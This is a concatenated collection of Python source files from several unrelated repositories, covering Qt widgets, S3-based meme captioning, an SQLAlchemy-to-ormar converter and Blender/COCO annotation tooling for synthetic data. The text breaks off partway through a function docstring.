self.__edit.selectAll()
self.__edit.setFocus()
self.__edit.editingFinished.connect(self.finish_rename)
def finish_rename(self):
self.setTabText(self.__edited_tab, self.__edit.text())
self.__edit.deleteLater()
self.mutex.unlock()
```
#### File: pyntpg/plot_tabs/plot_config_schema.py
```python
import cerberus
config_schema = {
"y-axis": {},
"z-axis": {},
}
def validate_config(schema, config):
"""
Ensure that the config dict contains at minimum, some set of expected key/value pairs.
Configure validation with self.base_config_schema. See [1] for schema documentation.
[1] http://docs.python-cerberus.org/en/stable/schemas.html
:type schema: dict
:param schema: Cerberus schema specifying validation.
:type config: dict
:param config: Configuration to be validated against schema.
:rtype: dict
:return: Validated configuration, possibly with type coerced.
"""
if schema is None:
return config
v = cerberus.Validator(schema, purge_unknown=False)
if v.validate(config):
return v.document
else:
raise ValueError(v.errors)
``` |
{
"source": "5teffen/ViCE",
"score": 4
} |
#### File: ViCE/ViCE_pkg/data.py
```python
import pandas as pd
import numpy as np
class Data:
def __init__(self, path = '', data = None, target = -1, exception = [], categorical = [], example = ''):
if (example != ''):
# -- Available example datasets --
if (example == "diabetes"):
df = pd.read_csv("sample_data/diabetes.csv")
elif (example == "grad"):
df = pd.read_csv("sample_data/admissions.csv")
else:
raise ValueError("Unknown example dataset chosen")
self.feature_names = np.array(df.columns)[:-1]
all_data = np.array(df.values)
else:
if ((data is None) & (path == '') & (example == '')):
raise ValueError("Should provide either a data array or the path to the data")
elif (data is None):
df = pd.read_csv(path)
self.feature_names = np.array(df.columns)[:-1]
all_data = np.array(df.values)
else:
all_data = np.array(data.values)
self.feature_names = np.array(data.columns)[:-1]
# -- Split data and target values --
self.y = all_data[:,target]
self.X = np.delete(all_data, target, 1)
# self.no_samples, self.no_features = self.data.shape
# -- Specifying exceptions & categoricals --
self.ex = exception
self.cat = categorical
``` |
{
"source": "5thsymphony/sqlalchemy-to-ormar",
"score": 2
} |
#### File: 5thsymphony/sqlalchemy-to-ormar/setup.py
```python
import os
import re
from setuptools import setup
PACKAGE = "sqlalchemy-to-ormar"
URL = "https://github.com/collerek/sqlalchemy-to-ormar"
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
package = package.replace("-", "_")
with open(os.path.join(package, "__init__.py")) as f:
return re.search("__version__ = ['\"]([^'\"]+)['\"]", f.read()).group(1)
def get_long_description():
"""
Return the README.
"""
with open("README.md", encoding="utf8") as f:
return f.read()
def get_packages(package):
"""
Return root package and all sub-packages.
"""
package = package.replace("-", "_")
return [
dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, "__init__.py"))
]
setup(
name=PACKAGE,
version=get_version(PACKAGE),
url=URL,
license="MIT",
description="A simple auto-translator from sqlalchemy ORM models to ormar models.",
long_description=get_long_description(),
long_description_content_type="text/markdown",
keywords=["orm", "sqlalchemy", "ormar", "databases", "async", "alembic"],
author="<NAME>",
author_email="<EMAIL>",
packages=get_packages(PACKAGE),
package_data={PACKAGE: ["py.typed"]},
include_package_data=True,
zip_safe=False,
python_requires=">=3.6",
data_files=[("", ["LICENSE.md"])],
install_requires=["ormar", "sqlalchemy>=1.3.18,<=1.3.23"],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP",
"Framework :: AsyncIO",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
)
```
#### File: sqlalchemy-to-ormar/tests/test_self_relation.py
```python
from databases import Database
from sqlalchemy import (
Column,
ForeignKey,
Integer,
MetaData,
String,
create_engine,
)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy_to_ormar import sqlalchemy_to_ormar
Base = declarative_base()
Database_URL = "sqlite:///test.db"
engine = create_engine(Database_URL)
database = Database(Database_URL)
metadata = MetaData(engine)
class User(Base):
__tablename__ = "user"
USER_ID = Column(Integer(), primary_key=True)
FIRST_NAME = Column(String(255))
LAST_NAME = Column(String(255))
USERNAME = Column(String(255), index=True)
PASSWORD = Column(String(40))
EMAIL = Column(String(255))
PARENT_ID = Column(ForeignKey("user.USER_ID"), index=True) # type: ignore
parent = relationship("User", remote_side=[USER_ID])
def test_self_relation():
OrmarUser = sqlalchemy_to_ormar(User, database=database, metadata=metadata)
assert OrmarUser.extract_related_names() == {"parent", "users"}
``` |
{
"source": "5top1t/MemeTube",
"score": 3
} |
#### File: collage/meme/utils.py
```python
import os
import re
import datetime
import boto3
import botocore
from botocore.exceptions import ClientError
from pathlib import Path
from PIL import Image, ImageDraw, ImageFont
from dateutil.tz import tzlocal
from meme import (
constants,
settings
)
session = boto3.Session(profile_name=settings.AWS_PROFILE)
def meme_comment_to_frame(
meme_filename,
frame_filename,
comment,
font_style=constants.FONT_STYLE_DEFAULT,
font_size=constants.FONT_SIZE_DEFAULT,
font_fill=constants.FONT_FILL_DEFAULT,
bg_fill=constants.BG_FILL_DEFAULT,
bottom=constants.COMMENT_POSITION_DEFAULT,
test=settings.DEBUG
):
'''
Write a meme caption on the top or bottom of the frame. Save the result as a meme png.
Params:
-- meme_filename {string} - Local path to store combine frame and comment
-- frame_filename {string} - Local path to the YouTube screenshot frame
-- comment {string} - Meme caption
-- font_style {string} - Path to a ttf file for the font style
-- font_size {int} - Font size
-- font_fill {tuple{3}} - Color of the meme caption
-- bg_fill {tuple{4}} - Background color for the caption
-- bottom {bool} - Postion the caption on the bottom when True
-- test {bool} - Optional boolean used in testing
'''
try:
# Load file
im = Image.open(frame_filename)
W, H = im.size
# Format comment
caption, x, y = _comment_to_caption(comment, constants.COMMENT_WIDTH)
font = ImageFont.truetype(font_style, font_size)
# Compose a background
caption_border = 100
bg_width = W
bg_height = (font_size * y) + caption_border + H
im = _compose_image_with_background(
im, bg_width, bg_height, bg_fill=bg_fill, bottom=bottom)
# Add caption
draw = ImageDraw.Draw(im)
offset_w = (bg_width // 2) - (x // 2) * (font_size // 2) # center
offset_h = ((bg_height - H) // 2) - (y * (font_size // 2))
offset_h = H + offset_h if bottom else offset_h
offset = (offset_w, offset_h)
draw.text(offset, caption, fill=font_fill, font=font)
# Create a path and save the file
_validate_path(meme_filename)
if test:
im.show()
else:
im.save(meme_filename)
return True
except FileNotFoundError:
return False
def get_all_frames_from_s3(bucket, vtag):
'''
Gets a list images on s3 for a given youtube id.
Params:
-- bucket {string} - S3 bucket name
-- vtag {string} - YouTube vtag
'''
bucket = session.resource('s3').Bucket(bucket)
prefix = os.path.join(settings.AWS_FRAMES_DIR, vtag)
return [obj.key for obj in bucket.objects.filter(Prefix=prefix)]
def upload_meme_to_s3(bucket, filename, key):
'''
Uploads a meme from local dir to s3.
Params:
-- bucket {string} - S3 bucket name
-- filename {string} - Local filename for the s3 object
-- key {string} - Object prefix
'''
try:
if not _is_path_exists(filename):
return False
s3 = session.client('s3')
s3.upload_file(filename, bucket, key)
return True
except ClientError as e:
print(e)
# Not found
return False
def download_frame_from_s3(bucket, key, filename):
'''
Gets a frame from s3 and saves to settings.LOCAL_CLIP_DIR.
Params:
-- bucket {string} - S3 bucket name
-- key {string} - Object prefix
-- filename {string} - Local filename for the s3 object
'''
try:
if not _is_path_exists(filename):
_validate_path(filename)
s3 = session.client('s3')
s3.download_file(bucket, key, filename)
return True
except ClientError as e:
print(e)
# Not found
return False
def clean_local_artifacts(meme_filename, frame_filename):
'''
Free up some memory by deleting unsued images
Params:
-- meme_filename {string} - Local path to for meme png file
-- frame_filename {string} - Local path to the YouTube screenshot frame png file
'''
if _is_path_exists(meme_filename):
print('Recycling meme filename 🚮')
_delete_artifacts(meme_filename)
if _is_path_exists(frame_filename):
print('Recycling frame filename 🚮')
_delete_artifacts(frame_filename)
def _comment_to_caption(comment, max_width):
'''
Formats YouTube comment to be the meme caption.
Params:
-- comment {string} - YouTube comment.
-- max_width {int} - Max number of characters per line.
'''
curr_max_width = 0
curr_width = 0
curr_height = 1
if len(comment) > max_width:
caption = comment.split(' ')
for i in range(len(caption)):
caption[i] = caption[i].strip()
if curr_width + len(caption[i]) > max_width:
curr_max_width = curr_width if curr_width > curr_max_width else curr_max_width
curr_width = 0
curr_height += 1
caption[i] += '\n'
else:
curr_width += len(caption[i]) + 1 # word + space char
return ' '.join(caption), curr_max_width, curr_height
return comment, len(comment), curr_height
def _compose_image_with_background(
im,
bg_width,
bg_height,
bg_fill=constants.BG_FILL_DEFAULT,
bottom=constants.COMMENT_POSITION_DEFAULT
):
'''
Compose the YouTube frame with a background to write the text on
Params:
-- im {Image} - Local path to store combined frame and comment
-- bg_width {int} - Background width
-- bg_height {int} - Background height
-- bg_fill {tuple{4}} - Background color for the caption
-- bottom {bool} - Postion the caption background on the bottom when True
'''
background = Image.new(constants.COLOR_CHANNEL, (bg_width, bg_height), bg_fill)
# Create text space at top or bottom
bg_w, bg_h = background.size
offset_w = 0
offset_h = 0 if bottom else bg_h - im.height
offset = (offset_w, offset_h)
background.paste(im, offset)
return background
def _exists_object_on_s3(bucket, key):
'''
Determines if an s3 object exits.
Note folders return 'false', they not objects,
Params:
-- bucket {string} - S3 bucket name
-- key {string} - Object prefix
'''
s3 = session.client('s3')
try:
s3.head_object(Bucket=bucket, Key=os.path.join(
settings.AWS_FRAMES_DIR, key))
return True
except ClientError as e:
# Not found
return False
def _validate_path(p):
folders = p.split('/')
folders.pop()
_create_dir('/'.join(folders))
def _delete_artifacts(d):
pth = Path(d)
pth.unlink(missing_ok=True)
folders = d.split('/')
folders.pop()
parent_dir = '/'.join(folders)
if _is_dir_empty(parent_dir):
_delete_dir(parent_dir)
def _create_dir(d):
try:
Path(d).mkdir(parents=True)
except FileExistsError:
pass
def _delete_dir(d):
pth = Path(d)
for child in pth.glob('*'):
if child.is_file():
child.unlink(missing_ok=True)
else:
_delete_dir(child)
pth.rmdir()
def _is_path_exists(p):
return Path(p).exists()
def _is_dir_empty(d):
return not any(Path(d).iterdir())
``` |
{
"source": "5trobl/oaisys",
"score": 2
} |
#### File: oaisys/post_processing/annotation_writer.py
```python
import os
import sys
import warnings
import glob
import cv2
import numpy as np
from io_utils import PostprocessUtils
from io_utils import LabelFilter
class AnnotationWriter():
def __init__(self, cfg):
self.base_path = cfg.BASE_PATH
self.data_def = cfg.DATA_DEF[0]
self.batch_glob = cfg.BATCH_GLOB
self.sensors = cfg.SENSORS
self.channel_def = self._generate_channel_def()
self.out_path = os.path.join(self.base_path, cfg.OUT_FILE)
self.background = cfg.BACKGROUND
self.filters = cfg.FILTER[0]
self.data = {}
self.data_size = None
self.n_remaining_labels = 0
self.n_filtered_labels = 0
def run(self):
self._gather_sample_info()
print("Write Data ...")
self._write_data()
print(f"In total {self.data_size} samples processed. {self.n_remaining_labels} Labels remain while {self.n_filtered_labels} labels are filtered")
def _generate_channel_def(self):
channel_def = {}
for s in self.sensors:
_def = {**self.data_def["common"], **self.data_def[s]}
channel_def[s] = _def
return channel_def
def _gather_sample_info(self):
""" gathers all filenames of rendered images together """
print("searching for relevant files...")
b_dir = os.path.join(self.base_path, self.batch_glob)
batches = glob.glob(b_dir)
for sensor, s_def in self.channel_def.items():
sen_dict = {}
for channel, d in s_def.items():
ch_files = []
for b_path in batches:
#define path
g_str = d['glob']
in_dir = os.path.join(b_path, sensor, g_str) # assumption of path structure: base_path/[sensor]/[channel_glob]
_files = glob.glob(in_dir)
assert len(_files) != 0, "no files found here: " + in_dir
ch_files.extend(_files)
if not self.data_size:
self.data_size = len(ch_files)
else:
assert len(ch_files) == self.data_size, "different number of samples for: " + g_str
ch_files.sort() # ensure same ordering for all modalities
sen_dict[channel] = ch_files
self.data[sensor] = sen_dict
print(f"For sensor {sensor}, {self.data_size} data samples with following modalities found: {s_def.keys()}")
return
def _filter_data(self, data, label_key="inst_label"):
"applies label filter on data"
labels_orig = data[label_key]
# for statistical reasons
n_fil = 0
n_orig = np.unique(labels_orig).shape[0]
for _l in np.unique(labels_orig):
if _l != self.background:
binary_mask = np.where(labels_orig == _l, 1, 0).astype(np.bool)
for _method_key, filter_cfg in self.filters.items():
filter_method = eval("LabelFilter."+_method_key)
is_filtered = filter_method(binary_mask, filter_cfg, data=data)
if is_filtered:
# if one method filters current binary mask, no need for further filters
labels_orig[binary_mask] = self.background
n_fil += 1
break
n_rem = np.unique(data[label_key]).shape[0]
assert n_orig == n_rem + n_fil
return data, n_rem, n_fil
def _write_data(self):
""" writes dictionary of data channels into file
"""
raise NotImplementedError("Please Implement this method")
return
def _load_image(self, image_path):
"""Load one image
Args:
image_path: path to image
width: desired width of returned image
height: desired heigt of returned image
chanels:
Returns:
image (np.array)
"""
image = cv2.imread(image_path, cv2.IMREAD_ANYCOLOR | cv2.IMREAD_ANYDEPTH)
return image
```
#### File: oaisys/post_processing/coco_writer.py
```python
import os
import sys
import datetime
import numpy as np
import warnings
import glob
import cv2
import json
import yaml
from io_utils import CocoUtils, PostprocessUtils
from annotation_writer import AnnotationWriter
class CocoProcessor(AnnotationWriter):
def __init__(self, cfg):
super(CocoProcessor, self).__init__(cfg)
self.coco_data = None #TODO does this have to be a class member?
self.out_path = self.out_path + ".json"
self.tolerance = cfg.COCO.TOLERANCE
self.description = cfg.COCO.DESCRIPTION
self.supercategory = cfg.COCO.SUPERCATEGORY
self.reference_mod = cfg.COCO.REF_MODALITY
self.annotation_key = cfg.COCO.ANNOTATION_KEY
self.sensor_name = cfg.SENSORS
if len(self.sensor_name) == 1:
self.sensor_name = self.sensor_name[0]
else:
print("More than one sensor is specified for coco annotation")
sys.exit()
# is_crowd: defines if annotations describe single object(False) or a crowd/areas(True); single objects are encoded using with polygon, while crowds are encoded using column-major RLE (Run Length Encoding)
self.category_definitions = self._parse_category_definitions(cfg.COCO.CAT_DEFINITIONS_FILE)
self.inst2cat_key = cfg.COCO.INST2CAT if cfg.COCO.INST2CAT else self.annotation_key
self.instance_id_cnt = 0
def _parse_category_definitions(self, file_name):
with open(file_name, "r") as stream:
try:
cat_def = yaml.safe_load(stream)
except yaml.YAMLError as exc:
print(exc)
return cat_def
def _write_data(self):
image_key = self.reference_mod
annot_key = self.annotation_key
inst2cat_maps = self.data[self.sensor_name][self.inst2cat_key]
coco_data = self._generate_annotations(image_key, annot_key, self.category_definitions, inst2cat_key=self.inst2cat_key, dataset_description=self.description, supercategory=self.supercategory, tolerance=self.tolerance)
print("Coco annotations are written to: " + self.out_path)
with open(self.out_path, 'w') as fp:
json.dump(coco_data, fp)
return
def _generate_annotations(self, ref_key, annotation_key, category_definitions, dataset_description, inst2cat_key=None, supercategory=None, tolerance=2):
""" Generates coco annotations for rendered data
Args:
data:
image_paths: list of path strings pointing to the rendered images
annotation_maps: list of annotations maps;
category_definitions: dict(name:id) of all categories for current dataset;
inst2cat_key: dict mapping instance ids to category ids
dataset_description: name of dataset
supercategory: name of the supercategory; default description string
Return:
dict containing coco annotations
"""
if not supercategory:
supercategory = dataset_description
# TODO read this info from file?!
licenses = [
{
"id": 1,
"name": "Attribution-NonCommercial-ShareAlike License",
"url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
}
]
# TODO read this info from file?!
info = {
"description": dataset_description,
"url": "https://github.com/waspinator/pycococreator",
"version": "0.1.0",
"year": 2020,
"contributor": "<NAME>",
"date_created": datetime.datetime.utcnow().isoformat(' ')
}
# define categories
categories = []
for _id, _attr in category_definitions.items():
if _id != 0: # skip background
cat_dict = {
'id': int(_id),
'name': _attr['name'],
'supercategory': supercategory
}
categories.append(cat_dict) # NOTE do we have to check for duplicates?
imgs = []
annotations = []
for _id in range(0, self.data_size):
consider_sample = True
if _id % 200 == 0:
print(f"current data_sample: {_id}")
_data = {}
for key, val in self.data[self.sensor_name].items():
_map = self._load_image(val[_id])
#_data_def = self.data_def[self.sensor_name][key]
_data_def = self.channel_def[self.sensor_name][key]
if _data_def.get('post_process',False):
_map = PostprocessUtils.apply_postprocessing(_map, _data_def)
_data[key] = _map
# apply filters
_data, n_rem, n_fil = self._filter_data(_data)
self.n_remaining_labels += n_rem
self.n_filtered_labels += n_fil
_annot_map = _data[annotation_key]
_inst2cat_map = _data[inst2cat_key]
_ref_path = self.data[self.sensor_name][ref_key][_id] # reference path
_instances = np.unique(_annot_map)
tmp_annots = []
for inst in _instances:
if inst != 0 : # skip background
# binary object mask
inst_mask = np.where(_annot_map == inst, 1, 0).astype(np.float32)
if inst2cat_key: #NOTE later inst2cat might be None if only semantic labels are processed?!
cats = np.unique(inst_mask * _inst2cat_map)
if len(cats) != 2:
consider_sample = False
print(f"Something weired with the category labels is happening for {_ref_path}: cats are {len(cats)}")
break
cat_id = int(np.sort(cats)[-1])
else: #NOTE think about way to address this case
cat_id = 1
warnings.warn(f"No inst2cat map defined -> cat_id = 1")
if category_definitions.get(cat_id, True):
warnings.warn(f"The category with id {cat_id}, does not appear in the category-definitions -> The category is set to category_id: 1")
cat_id = 1
cat_info = {
'id': cat_id,
'is_crowd': category_definitions[cat_id]['is_crowd']
}
# coco info for instance
annotation = CocoUtils.create_annotation_info(self.instance_id_cnt, _id, cat_info, inst_mask, tolerance)
self.instance_id_cnt += 1
if annotation is not None:
tmp_annots.append(annotation)
coco_annotations = {
"info": info,
"licenses": licenses,
"categories": categories,
"images": imgs,
"annotations": annotations
}
return coco_annotations
```
#### File: oaisys/post_processing/default_config.py
```python
from yacs.config import CfgNode as CN
_C = CN(new_allowed=True)
###############
# General
###############
_C.FORMAT = "" # this defines the data format. it is recommended to leave this blank and define it via the cmd-line; ["coco", "hdf5"]
_C.BASE_PATH="" # absolute path to the rendered image batches
_C.BATCH_GLOB="batch_*" # common pattern of the batch folders; normally this is parameter does not have to be changed
_C.OUT_FILE = "annotations" # output file name without ending, since the file extension depends on the FORMAT
_C.SENSORS = ["sensor_1", "sensor_2"] # name of sensors which should be considered; if FORMAT=coco only one SENSOR is possible (still defined as list)
# channel definitions
# the "common" dict defines channels which are considered for every element,
# while the e.g. "rgbLeft" (note the key-name has to match the SENSOR name) have special channel definitions
#
# possible entries for data definitions
# e.g. "rgbLeft" :{
# [channel_name]: {
# "glob": [common pattern of related channel], # required for finding channel files
# "post_process": [post_processing name], # this is mainly for labels but can also be used to trim the depth maps; see also PostprocessUtils in io_utils.py, there also new post_processing methods can be defined;
# currently for label-channels: "post_process":"denoise_label" and for depth-channels: "post_process":"trim_channels"
# "num_classes": post_processing(denoise label) required parameter; please see cfg parameters maxInstanceLabelPerChannel(for instance labels) and num_labels_per_channel (for semantic labels)
# }
#}
_C.DATA_DEF = [{
'common': { # channels which are considered for every element in SENSOR list
"rgb":{"glob":"*rgb_00.png"},
},
'sensor_1':{ # specific channel definitions for SENSOR member rgbLeft
#"inst_label":{"post_process":"denoise_label", "num_classes": 51, "glob":"*instance_label*"},
#"sem_label":{"post_process":"denoise_label", "num_classes": 15, "glob":"*semantic_label*"},
#"pinhole_depth":{"glob":"*pinhole_depth_00.exr", "post_process":"trim_channels"},
#"euclidean_depth":{"glob":"*depth_euclidean.exr", "post_process":"trim_channels"},
},
'sensor_2':{}
}
]
_C.BACKGROUND = 0 # label ID which is considered as background
# FILTER definitions for the instance labels: key[method_name]:[method parameters]
# see also FilterLabels in io_utils.py
_C.FILTER = [{
"filter_by_area":{"min_area":40},
"filter_by_depth":{"depth_key": "pinhole_depth", "max_depth": 35, "thres_type":"avg"},
}]
def get_cfg_defaults():
"""Get a yacs CfgNode object with default values for my_project."""
# Return a clone so that the defaults will not be altered
# This is for the "local variable" use pattern
return _C.clone()
```
#### File: oaisys/scripts/coco_visualizer.py
```python
import argparse
import json
import os
from pycocotools import mask
import numpy as np
from PIL import Image, ImageFont, ImageDraw
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', dest='file', default='coco_annotations.json', help='coco annotation json file')
parser.add_argument('-i', '--image_index', dest='image_index', default=0, help='image over which to annotate, uses the rgb rendering', type=int)
parser.add_argument('-b', '--base_path', dest='base_path', default='examples/coco_annotations/output/coco_data', help='path to folder with coco_annotation.json and images', type=str)
parser.add_argument('--save', '-s', action='store_true', help='saves visualization of coco annotations under base_path/coco_annotated_x.png ')
parser.add_argument('--skip_vis', action='store_true', help='skips the visualization and only saves the annotated file')
args = parser.parse_args()
annot_file = args.file
image_idx = args.image_index
base_path = args.base_path
save = args.save
skip_vis = args.skip_vis
if skip_vis:
save = True
# Read coco_annotations config
with open(os.path.join(base_path, annot_file)) as f:
coco_data = json.load(f)
categories = coco_data["categories"]
annotations = coco_data["annotations"]
images = coco_data["images"]
for img_data in images:
if img_data["id"] == image_idx:
_path = os.path.join(base_path, img_data["file_name"])
#im_path = os.path.join(base_path, "img_{:04d}_rgb.png".format(image_idx))
img = Image.open(_path)
def get_category(_id):
category = [category["name"] for category in categories if category["id"] == _id]
if len(category) != 0:
return category[0]
else:
raise Exception("Category {} is not defined in {}".format(_id, os.path.join(base_path, annot_file)))
font = ImageFont.load_default()
# Add bounding boxes and masks
for idx, annotation in enumerate(annotations):
if annotation["image_id"] == image_idx:
draw = ImageDraw.Draw(img)
bb = annotation['bbox']
draw.rectangle(((bb[0], bb[1]), (bb[0] + bb[2], bb[1] + bb[3])), fill=None, outline="red")
#draw.text((bb[0] + 2, bb[1] + 2), get_category(annotation["category_id"]), font=font)
#if annotation["iscrowd"]:
if isinstance(annotation["segmentation"], dict):
img.putalpha(255)
an_sg = annotation["segmentation"]
item = mask.decode(mask.frPyObjects(an_sg, im.size[1], im.size[0])).astype(np.uint8) * 255
item = Image.fromarray(item, mode='L')
overlay = Image.new('RGBA', im.size)
draw_ov = ImageDraw.Draw(overlay)
draw_ov.bitmap((0, 0), item, fill=(255, 0, 0, 128))
img = Image.alpha_composite(img, overlay)
else:
item = annotation["segmentation"][0]
poly = Image.new('RGBA', img.size)
pdraw = ImageDraw.Draw(poly)
pdraw.polygon(item, fill=(255, 255, 255, 127), outline=(255, 255, 255, 255))
img.paste(poly, mask=poly)
if not skip_vis:
img.show()
if save:
img.save(os.path.join(base_path, 'coco_annotated_{}.png'.format(image_idx)), "PNG")
```
#### File: assets/handle/TSSMaterialHandle.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
from src.TSSBase import TSSBase
class TSSMaterialHandle(TSSBase):
"""docstring for TSSMaterialHandle"""
def __init__(self):
super(TSSMaterialHandle, self).__init__()
# class vars ###################################################################################################
self._material_dict = {} # list of materials [list]
self._material_obj_list = [] # list of materials nodes [list]
############################################################################################ end of class vars #
def reset_module(self):
""" reset all local vars
Args:
None
Returns:
None
"""
# reset all sensors ############################################################################################
for material in self._material_obj_list:
# reset sensor
material.reset_module()
# maybe osbolete in future versions
del material
##################################################################################### end of reset all sensors #
self.reset_base()
# reset vars ###################################################################################################
self._material_dict = {}
self._material_obj_list = []
############################################################################################ end of reset vars #
def activate_pass(self,pass_name, pass_cfg, keyframe=-1):
""" activate pass function
Args:
pass_name: name of pass to activate [string]
pass_cfg: specific parameters for the pass [dict]
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
None
"""
for material in self._material_obj_list:
material.activate_pass(pass_name=pass_name,pass_cfg=pass_cfg,keyframe=keyframe)
def create(self):
""" create function
Args:
None
Returns:
None
"""
self._create_materials(cfg=self._cfg["MATERIALS"],
general_cfg=self._cfg["GENERAL"])
def _create_materials(self,cfg,general_cfg):
""" create function
Args:
cfg: cfg list of material modules [list]
general_cfg: general cfg [dict]
Returns:
success code [boolean]
"""
for ii, material in enumerate(cfg):
try:
# import module and create class #######################################################################
_module_name = "src.assets.materials." + material["type"]
_module = importlib.import_module(_module_name)
_class = getattr(_module, material["type"])
_material = _class()
################################################################ end of import module and create class #
# set pass params and create pass ######################################################################
# set general cfg
_material.set_general_cfg(cfg=general_cfg)
# save name of material
material["materialParams"]['name'] = material["name"]
# update sensor cfg
_material.update_cfg(cfg=material["materialParams"])
# create material
_material.create()
############################################################### end of set pass params and create pass #
# add pass to list
self._material_obj_list.append(_material)
self._material_dict[material["name"]] = _material.get_material()
except ImportError:
# manage import error
raise Exception("Cannot add material")
return -1
return 0
def get_materials(self):
""" return all materials
Args:
None
Returns:
dict of materials [dict]
"""
return self._material_dict
def get_material_objs(self):
""" get material objects
Args:
None
Returns:
list of material objects [list]
"""
return self._material_obj_list
```
#### File: assets/handle/TSSStageHandle.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
from src.TSSBase import TSSBase
class TSSStageHandle(TSSBase):
"""docstring for TSSStageHandle"""
def __init__(self):
super(TSSStageHandle, self).__init__()
# class vars ###################################################################################################
self._stage_list = [] # list of stage [list]
self._stage_obj_list = [] # list of stage nodes [list]
self._stage_dict = {} # dict of stages [dict]
############################################################################################ end of class vars #
def reset_module(self):
""" reset all local vars
Args:
None
Returns:
None
"""
# reset all stages ############################################################################################
for stage in self._stage_obj_list:
# reset sensor
stage.reset_module()
# maybe obsolete in future versions
del stage
##################################################################################### end of reset all stages #
self.reset_base()
self._stage_list = []
self._stage_obj_list = []
self._stage_dict = {}
def create(self,materials):
""" create function
Args:
materials: list of all materials [list]
Returns:
None
"""
self._create_stages(cfg=self._cfg["STAGES"],
general_cfg=self._cfg["GENERAL"],
materials=materials)
def update_after_meshes(self):
""" update mesh function
Args:
None
Returns:
None
"""
for stage in self._stage_obj_list:
stage.update_after_meshes()
def _create_stages(self,cfg,general_cfg,materials):
""" create function
Args:
cfg: list of stage cfgs [list]
general_cfg: general cfg [dict]
materials: list of all materials [list]
Returns:
None
"""
for ii, stage in enumerate(cfg):
try:
# import module and create class #######################################################################
_module_name = "src.assets.stages." + stage["type"]
_module = importlib.import_module(_module_name)
_class = getattr(_module, stage["type"])
_stage = _class()
################################################################ end of import module and create class #
# set pass params and create pass ######################################################################
# set general cfg
_stage.set_general_cfg(cfg=general_cfg)
# save name of stage
stage["stageParams"]['name'] = stage["name"]
# update stage cfg
_stage.update_cfg(cfg=stage["stageParams"])
# create material
_stage.create()
# return desired material
_material = _stage.get_desired_material()
############################################################### end of set pass params and create pass #
if _material:
if _material in materials:
_stage.apply_material(material=materials[_material])
else:
raise Exception("Material not found!")
# add pass to list
self._stage_obj_list.append(_stage)
self._stage_list.append(_stage.get_stage())
self._stage_dict[stage["name"]]=_stage.get_stage()
except ImportError:
# manage import error
raise Exception("Cannot add stage")
return -1
return 0
def get_stages(self):
""" get all stages
Args:
None
Returns:
list of stage [list]
"""
return self._stage_list
def get_stage_objs(self):
""" get all stage objects
Args:
None
Returns:
list of stage objects [list]
"""
return self._stage_obj_list
def get_stage_dict(self):
""" get all stage dict
Args:
None
Returns:
list of stage dict [dict]
"""
return self._stage_dict
```
#### File: assets/materials/MaterialTerrain.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
import copy
import os
import json
import copy as cp
from src.assets.TSSMaterial import TSSMaterial
class MaterialTerrain(TSSMaterial):
"""docstring for MaterialTerrain"""
def __init__(self):
super(MaterialTerrain, self).__init__()
# class vars ###################################################################################################
self._material_list = []
self._texture_dict = {}
self._num_labels_per_channel = 15
self._general_terrain_cfg = None
self._terrain_cfg = None
self._label_ID_node = None
self._node_tree = None
############################################################################################ end of class vars #
def reset(self):
""" reset function
Args:
None
Returns:
None
"""
# class vars ###################################################################################################
self._material_list = []
self._texture_dict = {}
self._num_labels_per_channel = 15
self._general_terrain_cfg = None
self._terrain_cfg = None
self._label_ID_node = None
self._node_tree = None
############################################################################################ end of class vars #
def load_template_for_assets(self,cfg):
_cfg = []
# TODO: find more generic solution
for terrain_sample in cfg:
if "templatePath" in terrain_sample:
# check if relative or absolute path is provided
if not os.path.isabs(terrain_sample["templatePath"]):
# create abs path
_rel_path = terrain_sample["templatePath"]
_current_path = os.path.dirname(__file__)
terrain_sample["templatePath"] = os.path.join(_current_path,"../../../",_rel_path)
with open(terrain_sample["templatePath"], 'r') as f:
_terrain_sample_tmp = json.load(f)
_terrain_sample_tmp.update(terrain_sample)
terrain_sample = _terrain_sample_tmp
del _terrain_sample_tmp["templatePath"]
_cfg.append(_terrain_sample_tmp)
else:
_cfg.append(terrain_sample)
return _cfg
def create(self):
""" create function
Args:
None
Returns:
None
"""
# print info msg
self._print_msg("Create Terrain Material")
# get cfgs #####################################################################################################
_terrain_cfg = self._cfg["terrainTextureList"]
_general_terrain_cfg = self._cfg["general"]
############################################################################################# end of get cfgs #
_terrain_cfg = self.load_template_for_assets(_terrain_cfg)
# create material
_terrain_material =\
self._create_mix_terrain_material( material_name=self._cfg["name"],
general_terrain_cfg=_general_terrain_cfg,
terrain_cfg=_terrain_cfg,
num_min_mix_terrains=_general_terrain_cfg["minNumMixTerrains"],
num_max_mix_terrains=_general_terrain_cfg["maxNumMixTerrains"],
hard_label_borders=_general_terrain_cfg["hardLabelBorders"],
noise_phase_shift_enabled=False,
noise_phase_rate=1.0,
with_replacement=_general_terrain_cfg["withReplacement"])
# assign created material to material var
self._material = _terrain_material
def _create_mix_terrain_material( self, material_name, general_terrain_cfg, terrain_cfg,
num_max_mix_terrains, num_min_mix_terrains, hard_label_borders,
noise_phase_shift_enabled,noise_phase_rate, with_replacement=True):
""" create mix terrain material.
Args:
material_name: name of the resulting mixed terrain material [string]
general_terrain_cfg: general cfg for terrain [dict]
terrain_cfg: specific cfg for each pure terrain texture [dict]
num_max_mix_terrains: number of max pure textures, which are merged together. If set
to -1, all textures are used [int]
num_min_mix_terrains: number of min pure textures, which are merged together [int]
hard_label_borders: if true, hard borders are provided for semantic labels [boolean]
noise_phase_shift_enabled: noise phase shift flag [boolean]
noise_phase_rate: noise shift rate [float]
with_replacement: sampling with replacmenet (true) or without (false) from the
terrain list [boolean]
Returns:
